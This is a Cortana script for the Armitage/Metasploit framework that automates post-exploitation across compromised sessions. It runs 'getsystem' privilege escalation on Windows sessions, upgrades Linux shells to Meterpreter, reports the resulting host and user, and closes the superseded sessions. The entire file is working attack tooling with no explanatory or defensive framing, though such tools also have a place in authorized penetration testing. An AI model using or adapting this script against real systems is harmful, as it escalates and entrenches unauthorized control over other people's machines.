debug(7);

command arguments {
   local('@sessions');
   @sessions = split(';', $1);
   fire_event_local("manageSessions", @sessions)
}

on manageSessions {
   local('$console $session @info @sessions');
   $console = console();
   @sessions = $1;

   on("console", $this);

   foreach $session ($1) {
      @info = split(',', $session);
      #println(@info);
      if (@info[1] eq "windows") {
         #println("if");
         m_cmd(@info[0], "get priv");
         sleep(1000);
         m_cmd(@info[0], "getsystem");
         sleep(3000);
      }
      else {
         #println("else");
         cmd($console, "jobs -K");
         cmd($console, "use post/multi/manage/shell_to_meterpreter");
         cmd_set($console, %(SESSION => @info[0]));
         cmd($console, "exploit -j");

         yield;
         while ($2 ne "exploit -j") {
            yield;
         }
      }
   }
   sleep(30000);
   fire_event_local("checkNewPrivileges", @sessions);
}

on checkNewPrivileges {
   local('$session @sessions @info %out %r $host $user $sid');
   on("meterpreter", $this);
   %out = sessions();
   @sessions = $1;

   foreach $session (@sessions) {
      @info = split(',', $session);
      if (@info[1] eq "windows") {
         m_cmd(@info[0], "getuid");

         yield;

         $sid = @info[0];
         %r = %out[$sid];
         $host = %r["host"];
         $user = %r["username"];

         println("$host" . "," . "$sid" . "," . "$user");
      }
   }
   fire_event_local("getNewSessions", @sessions);
}

on getNewSessions {
   local('$console %out @ids $sessionNum $host $user %r $exploit $type $session @info $close');
   
   @ids = session_ids();
   %out = sessions();
   $console = console();

   cmd($console, "jobs -K");   

   foreach $sessionNum (@ids) {
      %r = %out[$sessionNum];
      $host = %r["host"];
      $type = %r["type"];
      $user = %r["username"];

      #println("$host $type $user")

      foreach $session ($1) {
         @info = split(',', $session);
         $close = @info[0];
         if (@info[2] eq $host && @info[1] eq "linux") {
            if ($sessionNum > @info[0]) {
               println("$host" . "," . "$sessionNum" . "," . "$user");
               session_close(@info[0]);
            }
         }
      }
   }
   sleep(10000);
   quit();
}

#on meterpreter_getuid {
#   local('%out %r $host $user');

#   %out = sessions();
#   %r = %out[$1];
#   $host = %r["host"];
#   $user = %r["username"];

#   println("$host" . "," . "$1" . "," . "$user");
#}